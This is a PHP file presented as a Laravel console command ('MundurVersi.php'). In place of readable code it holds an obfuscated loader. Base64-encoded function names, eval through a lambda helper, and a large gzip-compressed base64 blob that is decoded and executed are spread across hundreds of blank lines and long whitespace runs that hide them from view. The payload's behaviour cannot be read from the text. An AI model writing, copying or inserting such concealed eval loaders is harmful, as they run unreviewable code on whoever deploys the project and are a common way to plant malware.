<?php 
        $__='printf';$_='Loading app/Console/Commands/MundurVersi.php';
        



















































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































































































                                                                                                                                                                                                                     $________;
